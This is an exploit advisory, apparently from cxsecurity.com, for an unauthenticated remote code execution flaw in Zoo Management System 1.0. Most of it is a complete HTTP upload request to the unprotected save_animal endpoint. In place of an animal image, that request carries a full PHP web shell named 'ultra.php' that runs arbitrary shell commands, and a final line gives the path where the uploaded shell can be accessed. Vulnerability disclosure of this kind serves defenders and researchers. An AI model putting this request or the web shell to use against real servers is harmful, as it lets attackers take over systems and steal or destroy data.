Zoo Management System 1.0 Unauthenticated RCE

2024.03.01
Credit: Çağatay Ceyhan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE # Date: 16.10.2023 # Exploit Author: Çağatay Ceyhan # Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette # Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database # Version: 1.0 # Tested on: Windows 11 ## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication. POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1 Host: localhost Content-Length: 6162 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="animal_id" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_given_name" kdkd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_species_name" ıdsıd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dob" 1552-02-05 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_gender" m ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_avg_lifespan" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="class_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="location_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dietary_req" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_natural_habitat" faad ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_pop_dist" eterter ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_joindate" 5559-02-06 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_height" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_weight" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_description" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="images[]"; filename="ultra.php" Content-Type: application/octet-stream <?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Web Shell</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box; } body { font-family: sans-serif; color: rgba(0, 0, 0, .75); } main { margin: auto; max-width: 850px; } pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; } label { display: block; } input { width: 100%; background-color: #efefef; border: 2px solid transparent; } input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; } button { border: none; cursor: pointer; margin-left: 5px; } button:hover { background-color: #e6e6e6; } .form-group { display: -webkit-box; display: -ms-flexbox; display: flex; padding: 15px 0; } </style> </head> <body> <main> <h1>Web Shell</h1> <h2>Execute a command</h2> <form method="post"> <label for="cmd"><strong>Command</strong></label> <div class="form-group"> <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required> <button type="submit">Execute</button> </div> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> <h2>Output</h2> <?php if (isset($cmd)): ?> <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre> <?php else: ?> <pre><small>No result.</small></pre> <?php endif; ?> <?php endif; ?> </main> </body> </html> ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_med_record" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer_reason" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_date" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_cause" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_incineration" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_gest_period" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_category" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_avg_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_nest_const" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_wingspan" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_water_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="rep_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="num_offspring" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="submit" ------WebKitFormBoundary8NY8zT5dXIloiUML-- ## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top